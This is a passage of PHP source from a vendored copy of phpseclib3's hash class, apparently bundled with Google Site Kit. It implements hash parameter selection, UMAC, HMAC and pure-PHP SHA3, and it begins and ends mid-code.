break; case 'sha1': $this->length = 20; break; case 'sha224': case 'sha512/224': case 'sha3-224': $this->length = 28; break; case 'keccak256': $this->paddingType = self::PADDING_KECCAK; // fall-through case 'sha256': case 'sha512/256': case 'sha3-256': $this->length = 32; break; case 'sha384': case 'sha3-384': $this->length = 48; break; case 'sha512': case 'sha3-512': $this->length = 64; break; default: if (\preg_match('#^(shake(?:128|256))-(\\d+)$#', $hash, $matches)) { $this->paddingType = self::PADDING_SHAKE; $hash = $matches[1]; $this->length = $matches[2] >> 3; } else { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException("{$hash} is not a supported algorithm"); } } switch ($hash) { case 'md2': case 'md2-96': $this->blockSize = 128; break; case 'md5-96': case 'sha1-96': case 'sha224-96': case 'sha256-96': case 'md5': case 'sha1': case 'sha224': case 'sha256': $this->blockSize = 512; break; case 'sha3-224': $this->blockSize = 1152; // 1600 - 2*224 break; case 'sha3-256': case 'shake256': case 'keccak256': $this->blockSize = 1088; // 1600 - 2*256 break; case 'sha3-384': $this->blockSize = 832; // 1600 - 2*384 break; case 'sha3-512': $this->blockSize = 576; // 1600 - 2*512 break; case 'shake128': $this->blockSize = 1344; // 1600 - 2*128 break; default: $this->blockSize = 1024; } if (\in_array(\substr($hash, 0, 5), ['sha3-', 'shake', 'kecca'])) { // PHP 7.1.0 introduced support for "SHA3 fixed mode algorithms": // http://php.net/ChangeLog-7.php#7.1.0 if (\version_compare(\PHP_VERSION, '7.1.0') < 0 || \substr($hash, 0, 5) != 'sha3-') { //preg_match('#(\d+)$#', $hash, $matches); //$this->parameters['capacity'] = 2 * $matches[1]; // 1600 - $this->blockSize //$this->parameters['rate'] = 1600 - $this->parameters['capacity']; // == $this->blockSize if (!$this->paddingType) { $this->paddingType = self::PADDING_SHA3; } $this->parameters = ['capacity' => 1600 - $this->blockSize, 'rate' => $this->blockSize, 'length' => $this->length, 'padding' => $this->paddingType]; $hash = ['Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Hash', \PHP_INT_SIZE == 8 ? 'sha3_64' : 'sha3_32']; } } if ($hash == 'sha512/224' || $hash == 'sha512/256') { // PHP 7.1.0 introduced sha512/224 and sha512/256 support: // http://php.net/ChangeLog-7.php#7.1.0 if (\version_compare(\PHP_VERSION, '7.1.0') < 0) { // from http://csrc.nist.gov/publications/fips/fips180-4/fips-180-4.pdf#page=24 $initial = $hash == 'sha512/256' ? ['22312194FC2BF72C', '9F555FA3C84C64C2', '2393B86B6F53B151', '963877195940EABD', '96283EE2A88EFFE3', 'BE5E1E2553863992', '2B0199FC2C85B8AA', '0EB72DDC81C52CA2'] : ['8C3D37C819544DA2', '73E1996689DCD4D6', '1DFAB7AE32FF9C82', '679DD514582F9FCF', '0F6D2B697BD44DA8', '77E36F7304C48942', '3F9D85A86A1D36C8', '1112E6AD91D692A1']; for ($i = 0; $i < 8; $i++) { if (\PHP_INT_SIZE == 8) { list(, $initial[$i]) = \unpack('J', \pack('H*', $initial[$i])); } else { $initial[$i] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($initial[$i], 16); $initial[$i]->setPrecision(64); } } $this->parameters = \compact('initial'); $hash = ['Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\Hash', \PHP_INT_SIZE == 8 ? 'sha512_64' : 'sha512']; } } if (\is_array($hash)) { $b = $this->blockSize >> 3; $this->ipad = \str_repeat(\chr(0x36), $b); $this->opad = \str_repeat(\chr(0x5c), $b); } $this->algo = $hash; $this->computeKey(); } /** * KDF: Key-Derivation Function * * The key-derivation function generates pseudorandom bits used to key the hash functions. * * @param int $index a non-negative integer less than 2^64 * @param int $numbytes a non-negative integer less than 2^64 * @return string string of length numbytes bytes */ private function kdf($index, $numbytes) { $this->c->setIV(\pack('N4', 0, $index, 0, 1)); return $this->c->encrypt(\str_repeat("\x00", $numbytes)); } /** * PDF Algorithm * * @return string string of length taglen bytes. */ private function pdf() { $k = $this->key; $nonce = $this->nonce; $taglen = $this->length; // // Extract and zero low bit(s) of Nonce if needed // if ($taglen <= 8) { $last = \strlen($nonce) - 1; $mask = $taglen == 4 ? "\x03" : "\x01"; $index = $nonce[$last] & $mask; $nonce[$last] = $nonce[$last] ^ $index; } // // Make Nonce BLOCKLEN bytes by appending zeroes if needed // $nonce = \str_pad($nonce, 16, "\x00"); // // Generate subkey, encipher and extract indexed substring // $kp = $this->kdf(0, 16); $c = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES('ctr'); $c->disablePadding(); $c->setKey($kp); $c->setIV($nonce); $t = $c->encrypt("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"); // we could use ord() but per https://paragonie.com/blog/2016/06/constant-time-encoding-boring-cryptography-rfc-4648-and-you // unpack() doesn't leak timing info return $taglen <= 8 ? \substr($t, \unpack('C', $index)[1] * $taglen, $taglen) : \substr($t, 0, $taglen); } /** * UHASH Algorithm * * @param string $m string of length less than 2^67 bits. * @param int $taglen the integer 4, 8, 12 or 16. * @return string string of length taglen bytes. */ private function uhash($m, $taglen) { // // One internal iteration per 4 bytes of output // $iters = $taglen >> 2; // // Define total key needed for all iterations using KDF. // L1Key reuses most key material between iterations. // //$L1Key = $this->kdf(1, 1024 + ($iters - 1) * 16); $L1Key = $this->kdf(1, (1024 + ($iters - 1)) * 16); $L2Key = $this->kdf(2, $iters * 24); $L3Key1 = $this->kdf(3, $iters * 64); $L3Key2 = $this->kdf(4, $iters * 4); // // For each iteration, extract key and do three-layer hash. // If bytelength(M) <= 1024, then skip L2-HASH. // $y = ''; for ($i = 0; $i < $iters; $i++) { $L1Key_i = \substr($L1Key, $i * 16, 1024); $L2Key_i = \substr($L2Key, $i * 24, 24); $L3Key1_i = \substr($L3Key1, $i * 64, 64); $L3Key2_i = \substr($L3Key2, $i * 4, 4); $a = self::L1Hash($L1Key_i, $m); $b = \strlen($m) <= 1024 ? "\x00\x00\x00\x00\x00\x00\x00\x00{$a}" : self::L2Hash($L2Key_i, $a); $c = self::L3Hash($L3Key1_i, $L3Key2_i, $b); $y .= $c; } return $y; } /** * L1-HASH Algorithm * * The first-layer hash breaks the message into 1024-byte chunks and * hashes each with a function called NH. Concatenating the results * forms a string, which is up to 128 times shorter than the original. * * @param string $k string of length 1024 bytes. * @param string $m string of length less than 2^67 bits. * @return string string of length (8 * ceil(bitlength(M)/8192)) bytes. */ private static function L1Hash($k, $m) { // // Break M into 1024 byte chunks (final chunk may be shorter) // $m = \str_split($m, 1024); // // For each chunk, except the last: endian-adjust, NH hash // and add bit-length. Use results to build Y. // $length = 1024 * 8; $y = ''; for ($i = 0; $i < \count($m) - 1; $i++) { $m[$i] = \pack('N*', ...\unpack('V*', $m[$i])); // ENDIAN-SWAP $y .= \PHP_INT_SIZE == 8 ? static::nh64($k, $m[$i], $length) : static::nh32($k, $m[$i], $length); } // // For the last chunk: pad to 32-byte boundary, endian-adjust, // NH hash and add bit-length. Concatenate the result to Y. // $length = \count($m) ? \strlen($m[$i]) : 0; $pad = 32 - $length % 32; $pad = \max(32, $length + $pad % 32); $m[$i] = \str_pad(isset($m[$i]) ? $m[$i] : '', $pad, "\x00"); // zeropad $m[$i] = \pack('N*', ...\unpack('V*', $m[$i])); // ENDIAN-SWAP $y .= \PHP_INT_SIZE == 8 ? static::nh64($k, $m[$i], $length * 8) : static::nh32($k, $m[$i], $length * 8); return $y; } /** * 32-bit safe 64-bit Multiply with 2x 32-bit ints * * @param int $x * @param int $y * @return string $x * $y */ private static function mul32_64($x, $y) { // see mul64() for a more detailed explanation of how this works $x1 = $x >> 16 & 0xffff; $x0 = $x & 0xffff; $y1 = $y >> 16 & 0xffff; $y0 = $y & 0xffff; // the following 3x lines will possibly yield floats $z2 = $x1 * $y1; $z0 = $x0 * $y0; $z1 = $x1 * $y0 + $x0 * $y1; $a = \intval(\fmod($z0, 65536)); $b = \intval($z0 / 65536) + \intval(\fmod($z1, 65536)); $c = \intval($z1 / 65536) + \intval(\fmod($z2, 65536)) + \intval($b / 65536); $b = \intval(\fmod($b, 65536)); $d = \intval($z2 / 65536) + \intval($c / 65536); $c = \intval(\fmod($c, 65536)); $d = \intval(\fmod($d, 65536)); return \pack('n4', $d, $c, $b, $a); } /** * 32-bit safe 64-bit Addition with 2x 64-bit strings * * @param int $x * @param int $y * @return int $x * $y */ private static function add32_64($x, $y) { list(, $x1, $x2, $x3, $x4) = \unpack('n4', $x); list(, $y1, $y2, $y3, $y4) = \unpack('n4', $y); $a = $x4 + $y4; $b = $x3 + $y3 + ($a >> 16); $c = $x2 + $y2 + ($b >> 16); $d = $x1 + $y1 + ($c >> 16); return \pack('n4', $d, $c, $b, $a); } /** * 32-bit safe 32-bit Addition with 2x 32-bit strings * * @param int $x * @param int $y * @return int $x * $y */ private static function add32($x, $y) { // see add64() for a more detailed explanation of how this works $x1 = $x & 0xffff; $x2 = $x >> 16 & 0xffff; $y1 = $y & 0xffff; $y2 = $y >> 16 & 0xffff; $a = $x1 + $y1; $b = $x2 + $y2 + ($a >> 16) << 16; $a &= 0xffff; return $a | $b; } /** * NH Algorithm / 32-bit safe * * @param string $k string of length 1024 bytes. * @param string $m string with length divisible by 32 bytes. * @return string string of length 8 bytes. */ private static function nh32($k, $m, $length) { // // Break M and K into 4-byte chunks // $k = \unpack('N*', $k); $m = \unpack('N*', $m); $t = \count($m); // // Perform NH hash on the chunks, pairing words for multiplication // which are 4 apart to accommodate vector-parallelism. // $i = 1; $y = "\x00\x00\x00\x00\x00\x00\x00\x00"; while ($i <= $t) { $temp = self::add32($m[$i], $k[$i]); $temp2 = self::add32($m[$i + 4], $k[$i + 4]); $y = self::add32_64($y, self::mul32_64($temp, $temp2)); $temp = self::add32($m[$i + 1], $k[$i + 1]); $temp2 = self::add32($m[$i + 5], $k[$i + 5]); $y = self::add32_64($y, self::mul32_64($temp, $temp2)); $temp = self::add32($m[$i + 2], $k[$i + 2]); $temp2 = self::add32($m[$i + 6], $k[$i + 6]); $y = self::add32_64($y, self::mul32_64($temp, $temp2)); $temp = self::add32($m[$i + 3], $k[$i + 3]); $temp2 = self::add32($m[$i + 7], $k[$i + 7]); $y = self::add32_64($y, self::mul32_64($temp, $temp2)); $i += 8; } return self::add32_64($y, \pack('N2', 0, $length)); } /** * 64-bit Multiply with 2x 32-bit ints * * @param int $x * @param int $y * @return int $x * $y */ private static function mul64($x, $y) { // since PHP doesn't implement unsigned integers we'll implement them with signed integers // to do this we'll use karatsuba multiplication $x1 = $x >> 16; $x0 = $x & 0xffff; $y1 = $y >> 16; $y0 = $y & 0xffff; $z2 = $x1 * $y1; // up to 32 bits long $z0 = $x0 * $y0; // up to 32 bits long $z1 = $x1 * $y0 + $x0 * $y1; // up to 33 bit long // normally karatsuba multiplication calculates $z1 thusly: //$z1 = ($x1 + $x0) * ($y0 + $y1) - $z2 - $z0; // the idea being to eliminate one extra multiplication. for arbitrary precision math that makes sense // but not for this purpose // at this point karatsuba would normally return this: //return ($z2 << 64) + ($z1 << 32) + $z0; // the problem is that the output could be out of range for signed 64-bit ints, // which would cause PHP to switch to floats, which would risk losing the lower few bits // as such we'll OR 4x 16-bit blocks together like so: /* ........ | ........ | ........ | ........ upper $z2 | lower $z2 | lower $z1 | lower $z0 | +upper $z1 | +upper $z0 | + $carry | + $carry | | */ // technically upper $z1 is 17 bit - not 16 - but the most significant digit of that will // just get added to $carry $a = $z0 & 0xffff; $b = ($z0 >> 16) + ($z1 & 0xffff); $c = ($z1 >> 16) + ($z2 & 0xffff) + ($b >> 16); $b = ($b & 0xffff) << 16; $d = ($z2 >> 16) + ($c >> 16); $c = ($c & 0xffff) << 32; $d = ($d & 0xffff) << 48; return $a | $b | $c | $d; } /** * 64-bit Addition with 2x 64-bit ints * * @param int $x * @param int $y * @return int $x + $y */ private static function add64($x, $y) { // doing $x + $y risks returning a result that's out of range for signed 64-bit ints // in that event PHP would convert the result to a float and precision would be lost // so we'll just add 2x 32-bit ints together like so: /* ........ | ........ upper $x | lower $x +upper $y |+lower $y + $carry | */ $x1 = $x & 0xffffffff; $x2 = $x >> 32 & 0xffffffff; $y1 = $y & 0xffffffff; $y2 = $y >> 32 & 0xffffffff; $a = $x1 + $y1; $b = $x2 + $y2 + ($a >> 32) << 32; $a &= 0xffffffff; return $a | $b; } /** * NH Algorithm / 64-bit safe * * @param string $k string of length 1024 bytes. * @param string $m string with length divisible by 32 bytes. * @return string string of length 8 bytes. */ private static function nh64($k, $m, $length) { // // Break M and K into 4-byte chunks // $k = \unpack('N*', $k); $m = \unpack('N*', $m); $t = \count($m); // // Perform NH hash on the chunks, pairing words for multiplication // which are 4 apart to accommodate vector-parallelism. // $i = 1; $y = 0; while ($i <= $t) { $temp = $m[$i] + $k[$i] & 0xffffffff; $temp2 = $m[$i + 4] + $k[$i + 4] & 0xffffffff; $y = self::add64($y, self::mul64($temp, $temp2)); $temp = $m[$i + 1] + $k[$i + 1] & 0xffffffff; $temp2 = $m[$i + 5] + $k[$i + 5] & 0xffffffff; $y = self::add64($y, self::mul64($temp, $temp2)); $temp = $m[$i + 2] + $k[$i + 2] & 0xffffffff; $temp2 = $m[$i + 6] + $k[$i + 6] & 0xffffffff; $y = self::add64($y, self::mul64($temp, $temp2)); $temp = $m[$i + 3] + $k[$i + 3] & 0xffffffff; $temp2 = $m[$i + 7] + $k[$i + 7] & 0xffffffff; $y = self::add64($y, self::mul64($temp, $temp2)); $i += 8; } return \pack('J', self::add64($y, $length)); } /** * L2-HASH: Second-Layer Hash * * The second-layer rehashes the L1-HASH output using a polynomial hash * called POLY. If the L1-HASH output is long, then POLY is called once * on a prefix of the L1-HASH output and called using different settings * on the remainder. (This two-step hashing of the L1-HASH output is * needed only if the message length is greater than 16 megabytes.) * Careful implementation of POLY is necessary to avoid a possible * timing attack (see Section 6.6 for more information). * * @param string $k string of length 24 bytes. * @param string $m string of length less than 2^64 bytes. * @return string string of length 16 bytes. */ private static function L2Hash($k, $m) { // // Extract keys and restrict to special key-sets // $k64 = $k & "\x01\xff\xff\xff\x01\xff\xff\xff"; $k64 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($k64, 256); $k128 = \substr($k, 8) & "\x01\xff\xff\xff\x01\xff\xff\xff\x01\xff\xff\xff\x01\xff\xff\xff"; $k128 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($k128, 256); // // If M is no more than 2^17 bytes, hash under 64-bit prime, // otherwise, hash first 2^17 bytes under 64-bit prime and // remainder under 128-bit prime. // if (\strlen($m) <= 0x20000) { // 2^14 64-bit words $y = self::poly(64, self::$maxwordrange64, $k64, $m); } else { $m_1 = \substr($m, 0, 0x20000); // 1 << 17 $m_2 = \substr($m, 0x20000) . "\x80"; $length = \strlen($m_2); $pad = 16 - $length % 16; $pad %= 16; $m_2 = \str_pad($m_2, $length + $pad, "\x00"); // zeropad $y = self::poly(64, self::$maxwordrange64, $k64, $m_1); $y = \str_pad($y, 16, "\x00", \STR_PAD_LEFT); $y = self::poly(128, self::$maxwordrange128, $k128, $y . $m_2); } return \str_pad($y, 16, "\x00", \STR_PAD_LEFT); } /** * POLY Algorithm * * @param int $wordbits the integer 64 or 128. * @param BigInteger $maxwordrange positive integer less than 2^wordbits. * @param BigInteger $k integer in the range 0 ... prime(wordbits) - 1. * @param string $m string with length divisible by (wordbits / 8) bytes. * @return integer in the range 0 ... prime(wordbits) - 1. */ private static function poly($wordbits, $maxwordrange, $k, $m) { // // Define constants used for fixing out-of-range words // $wordbytes = $wordbits >> 3; if ($wordbits == 128) { $factory = self::$factory128; $offset = self::$offset128; $marker = self::$marker128; } else { $factory = self::$factory64; $offset = self::$offset64; $marker = self::$marker64; } $k = $factory->newInteger($k); // // Break M into chunks of length wordbytes bytes // $m_i = \str_split($m, $wordbytes); // // Each input word m is compared with maxwordrange. If not smaller // then 'marker' and (m - offset), both in range, are hashed. // $y = $factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1)); foreach ($m_i as $m) { $m = $factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($m, 256)); if ($m->compare($maxwordrange) >= 0) { $y = $k->multiply($y)->add($marker); $y = $k->multiply($y)->add($m->subtract($offset)); } else { $y = $k->multiply($y)->add($m); } } return $y->toBytes(); } /** * L3-HASH: Third-Layer Hash * * The output from L2-HASH is 16 bytes long. This final hash function * hashes the 16-byte string to a fixed length of 4 bytes. * * @param string $k1 string of length 64 bytes. * @param string $k2 string of length 4 bytes. * @param string $m string of length 16 bytes. * @return string string of length 4 bytes. */ private static function L3Hash($k1, $k2, $m) { $factory = self::$factory36; $y = $factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger()); for ($i = 0; $i < 8; $i++) { $m_i = $factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\substr($m, 2 * $i, 2), 256)); $k_i = $factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\substr($k1, 8 * $i, 8), 256)); $y = $y->add($m_i->multiply($k_i)); } $y = \str_pad(\substr($y->toBytes(), -4), 4, "\x00", \STR_PAD_LEFT); $y = $y ^ $k2; return $y; } /** * Compute the Hash / HMAC / UMAC. * * @param string $text * @return string */ public function hash($text) { $algo = $this->algo; if ($algo == 'umac') { if ($this->recomputeAESKey) { if (!\is_string($this->nonce)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('No nonce has been set'); } if (!\is_string($this->key)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('No key has been set'); } if (\strlen($this->key) != 16) { throw new \LengthException('Key must be 16 bytes long'); } if (!isset(self::$maxwordrange64)) { $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); $prime36 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger("\x00\x00\x00\x0f\xff\xff\xff\xfb", 256); self::$factory36 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField($prime36); $prime64 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger("\xff\xff\xff\xff\xff\xff\xff\xc5", 256); self::$factory64 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField($prime64); $prime128 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger("\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xffa", 256); self::$factory128 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField($prime128); self::$offset64 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger("\x01\x00\x00\x00\x00\x00\x00\x00\x00", 256); self::$offset64 = self::$factory64->newInteger(self::$offset64->subtract($prime64)); self::$offset128 = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger("\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 256); self::$offset128 = self::$factory128->newInteger(self::$offset128->subtract($prime128)); self::$marker64 = self::$factory64->newInteger($prime64->subtract($one)); self::$marker128 = self::$factory128->newInteger($prime128->subtract($one)); $maxwordrange64 = $one->bitwise_leftShift(64)->subtract($one->bitwise_leftShift(32)); self::$maxwordrange64 = self::$factory64->newInteger($maxwordrange64); $maxwordrange128 = $one->bitwise_leftShift(128)->subtract($one->bitwise_leftShift(96)); self::$maxwordrange128 = self::$factory128->newInteger($maxwordrange128); } $this->c = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES('ctr'); $this->c->disablePadding(); $this->c->setKey($this->key); $this->pad = $this->pdf(); $this->recomputeAESKey = \false; } $hashedmessage = $this->uhash($text, $this->length); return $hashedmessage ^ $this->pad; } if (\is_array($algo)) { if (empty($this->key) || !\is_string($this->key)) { return \substr($algo($text, ...\array_values($this->parameters)), 0, $this->length); } // SHA3 HMACs are discussed at https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.202.pdf#page=30 $key = \str_pad($this->computedKey, $b, \chr(0)); $temp = $this->ipad ^ $key; $temp .= $text; $temp = \substr($algo($temp, ...\array_values($this->parameters)), 0, $this->length); $output = $this->opad ^ $key; $output .= $temp; $output = $algo($output, ...\array_values($this->parameters)); return \substr($output, 0, $this->length); } $output = !empty($this->key) || \is_string($this->key) ? \hash_hmac($algo, $text, $this->computedKey, \true) : \hash($algo, $text, \true); return \strlen($output) > $this->length ? \substr($output, 0, $this->length) : $output; } /** * Returns the hash length (in bits) * * @return int */ public function getLength() { return $this->length << 3; } /** * Returns the hash length (in bytes) * * @return int */ public function getLengthInBytes() { return $this->length; } /** * Returns the block length (in bits) * * @return int */ public function getBlockLength() { return $this->blockSize; } /** * Returns the block length (in bytes) * * @return int */ public function getBlockLengthInBytes() { return $this->blockSize >> 3; } /** * Pads SHA3 based on the mode * * @param int $padLength * @param int $padType * @return string */ private static function sha3_pad($padLength, $padType) { switch ($padType) { case self::PADDING_KECCAK: $temp = \chr(0x1) . \str_repeat("\x00", $padLength - 1); $temp[$padLength - 1] = $temp[$padLength - 1] | \chr(0x80); return $temp; case self::PADDING_SHAKE: $temp = \chr(0x1f) . \str_repeat("\x00", $padLength - 1); $temp[$padLength - 1] = $temp[$padLength - 1] | \chr(0x80); return $temp; //case self::PADDING_SHA3: default: // from https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.202.pdf#page=36 return $padLength == 1 ? \chr(0x86) : \chr(0x6) . \str_repeat("\x00", $padLength - 2) . \chr(0x80); } } /** * Pure-PHP 32-bit implementation of SHA3 * * Whereas BigInteger.php's 32-bit engine works on PHP 64-bit this 32-bit implementation * of SHA3 will *not* work on PHP 64-bit. This is because this implementation * employees bitwise NOTs and bitwise left shifts. And the round constants only work * on 32-bit PHP. eg. dechex(-2147483648) returns 80000000 on 32-bit PHP and * FFFFFFFF80000000 on 64-bit PHP. Sure, we could do bitwise ANDs but that would slow * things down. * * SHA512 requires BigInteger to simulate 64-bit unsigned integers because SHA2 employees * addition whereas SHA3 just employees bitwise operators. PHP64 only supports signed * 64-bit integers, which complicates addition, whereas that limitation isn't an issue * for SHA3. * * In https://ws680.nist.gov/publication/get_pdf.cfm?pub_id=919061#page=16 KECCAK[C] is * defined as "the KECCAK instance with KECCAK-f[1600] as the underlying permutation and * capacity c". This is relevant because, altho the KECCAK standard defines a mode * (KECCAK-f[800]) designed for 32-bit machines that mode is incompatible with SHA3 * * @param string $p * @param int $c * @param int $r * @param int $d * @param int $padType */ private static function sha3_32($p, $c, $r, $d, $padType) { $block_size = $r >> 3; $padLength = $block_size - \strlen($p) % $block_size; $num_ints = $block_size >> 2; $p .= static::sha3_pad($padLength, $padType); $n = \strlen($p) / $r; // number of blocks $s = [[[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]], [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]], [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]], [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]], [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]]; $p = \str_split($p, $block_size); foreach ($p as $pi) { $pi = \unpack('V*', $pi); $x = $y = 0; for ($i = 1; $i <= $num_ints; $i += 2) { $s[$x][$y][0] ^= $pi[$i + 1]; $s[$x][$y][1] ^= $pi[$i]; if (++$y == 5) { $y = 0; $x++; } } static::processSHA3Block32($s); } $z = ''; $i = $j = 0; while (\strlen($z) < $d) { $z .= \pack('V2', $s[$i][$j][1], $s[$i][$j++][0]); if ($j == 5) { $j = 0; $i++; if ($i == 5) { $i = 0; static::processSHA3Block32($s); } } } return $z; } /** * 32-bit block processing method for SHA3 * * @param array $s */ private static function processSHA3Block32(&$s) { static $rotationOffsets = [[0, 1, 62, 28, 27], [36, 44, 6, 55, 20], [3, 10, 43, 25, 39], [41, 45, 15, 21, 8], [18, 2, 61, 56, 14]]; // the standards give these constants in hexadecimal notation. it's tempting to want to use // that same notation, here, however, we can't, because 0x80000000, on PHP32, is a positive // float - not the negative int that we need to be in PHP32. so we use -2147483648 instead static $roundConstants = [[0, 1], [0, 32898], [-2147483648, 32906], [-2147483648, -2147450880], [0, 32907], [0, -2147483647], [-2147483648, -2147450751], [-2147483648, 32777], [0, 138], [0, 136], [0, -2147450871], [0, -2147483638], [0, -2147450741], [-2147483648, 139], [-2147483648, 32905], [-2147483648, 32771], [-2147483648, 32770], [-2147483648, 128], [0, 32778], [-2147483648, -2147483638], [-2147483648, -2147450751], [-2147483648, 32896], [0, -2147483647], [-2147483648, -2147450872]]; for ($round = 0; $round < 24; $round++) { // theta step $parity = $rotated = []; for ($i = 0; $i < 5; $i++) { $parity[] = [$s[0][$i][0] ^ $s[1][$i][0] ^ $s[2][$i][0] ^ $s[3][$i][0] ^ $s[4][$i][0], $s[0][$i][1] ^ $s[1][$i][1] ^ $s[2][$i][1] ^ $s[3][$i][1] ^ $s[4][$i][1]]; $rotated[] = static::rotateLeft32($parity[$i], 1); } $temp = [[$parity[4][0] ^ $rotated[1][0], $parity[4][1] ^ $rotated[1][1]], [$parity[0][0] ^ $rotated[2][0], $parity[0][1] ^ $rotated[2][1]], [$parity[1][0] ^ $rotated[3][0], $parity[1][1] ^ $rotated[3][1]], [$parity[2][0] ^ $rotated[4][0], $parity[2][1] ^ $rotated[4][1]], [$parity[3][0] ^ $rotated[0][0], $parity[3][1] ^ $rotated[0][1]]]; for ($i = 0; $i < 5; $i++) { for ($j = 0; $j < 5; $j++) { $s[$i][$j][0] ^= $temp[$j][0]; $s[$i][$j][1] ^= $temp[$j][1]; } } $st = $s; // rho and pi steps for ($i = 0; $i < 5; $i++) { for ($j = 0; $j < 5; $j++) { $st[(2 * $i + 3 * $j) % 5][$j] = static::rotateLeft32($s[$j][$i], $rotationOffsets[$j][$i]); } } // chi step for ($i = 0; $i < 5; $i++) { $s[$i][0] = [$st[$i][0][0] ^ ~$st[$i][1][0] & $st[$i][2][0], $st[$i][0][1] ^ ~$st[$i][1][1] & $st[$i][2][1]]; $s[$i][1] = [$st[$i][1][0] ^ ~$st[$i][2][0] & $st[$i][3][0], $st[$i][1][1] ^ ~$st[$i][2][1] & $st[$i][3][1]]; $s[$i][2] = [$st[$i][2][0] ^ ~$st[$i][3][0] & $st[$i][4][0], $st[$i][2][1] ^ ~$st[$i][3][1] & $st[$i][4][1]]; $s[$i][3] = [$st[$i][3][0] ^ ~$st[$i][4][0] & $st[$i][0][0], $st[$i][3][1] ^ ~$st[$i][4][1] & $st[$i][0][1]]; $s[$i][4] = [$st[$i][4][0] ^ ~$st[$i][0][0] & $st[$i][1][0], $st[$i][4][1] ^ ~$st[$i][0][1] & $st[$i][1][1]]; } // iota step $s[0][0][0] ^= $roundConstants[$round][0]; $s[0][0][1] ^= $roundConstants[$round][1]; } } /** * Rotate 32-bit int * * @param array $x * @param int $shift */ private static function rotateLeft32($x, $shift) { if ($shift < 32) { list($hi, $lo) = $x; } else { $shift -= 32; list($lo, $hi) = $x; } $mask = -1 ^ -1 << $shift; return [$hi << $shift | $lo >> 32 - $shift & $mask, $lo << $shift | $hi >> 32 - $shift & $mask]; } /** * Pure-PHP 64-bit implementation of SHA3 * * @param string $p * @param int $c * @param int $r * @param int $d * @param int $padType */ private static function sha3_64($p, $c, $r, $d, $padType) { $block_size = $r >> 3; $padLength = $block_size - \strlen($p) % $block_size; $num_ints = $block_size >> 2; $p .= static::sha3_pad($padLength, $padType); $n = \strlen($p) / $r; // number of blocks $s = [[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]]; $p = \str_split($p, $block_size); foreach ($p as $pi) { $pi = \unpack('P*', $pi); $x = $y = 0; foreach ($pi as $subpi) { $s[$x][$y++] ^= $subpi; if ($y == 5) { $y = 0; $x++; } } static::processSHA3Block64($s); } $z = ''; $i = $j = 0; while (\strlen($z) < $d) { $z .= \pack('P', $s[$i][$j++]); if ($j == 5) { $j = 0; $i++; if ($i == 5) { $i = 0; static::processSHA3Block64($s); } } } return $z; } /** * 64-bit block processing method for SHA3 * * @param array $s */ private static function processSHA3Block64(&$s) { static $rotationOffsets = [[0, 1, 62, 28, 27], [36, 44, 6, 55, 20], [3, 10, 43, 25, 39], [41, 45, 15, 21, 8], [18, 2, 61, 56, 14]]; static $roundConstants = [1, 32898, -9223372036854742902, -9223372034707259392, 32907, 2147483649, -9223372034707259263, -9223372036854743031, 138, 136, 2147516425, 2147483658, 2147516555, -9223372036854775669, -9223372036854742903, -9223372036854743037, -9223372036854743038, -9223372036854775680, 32778, -9223372034707292150, -9223372034707259263, -9223372036854742912, 2147483649, -9223372034707259384]; for ($round = 0; $round < 24; $round++) { // theta step $parity = []; for ($i = 0; $i < 5; $i++) { $parity[] = $s[0][$i] ^ $s[1][$i] ^ $s[2][$i] ^ $s[3][$i] ^ $s[4][$i]; } $temp = [$parity[4] ^ static::rotateLeft64($parity[1], 1), $parity[0] ^ static::rotateLeft64($parity[2], 1), $parity[1] ^ static::rotateLeft64($parity[3], 1), $parity[2] ^ static::rotateLeft64($parity[4], 1), $parity[3] ^ static::rotateLeft64($parity[0], 1)]; for ($i = 0; $i < 5; $i++) { for ($j = 0; $j < 5; $j++) { $s[$i][$j] ^= $temp[$j]; } } $st = $s; // rho and pi steps for ($i = 0; $i < 5; $i++) { for ($j = 0; $j < 5; $j++) { $st[(2 * $i + 3 * $j) % 5][$j] = static::rotateLeft64($s[$j][$i], $rotationOffsets[$j][$i]); } } // chi step for ($i = 0; $i < 5; $i++) { $s[$i] = [$st[$i][0] ^ ~$st[$i][1] & $st[$i][2], $st[$i][1] ^ ~$st[$i][2] & 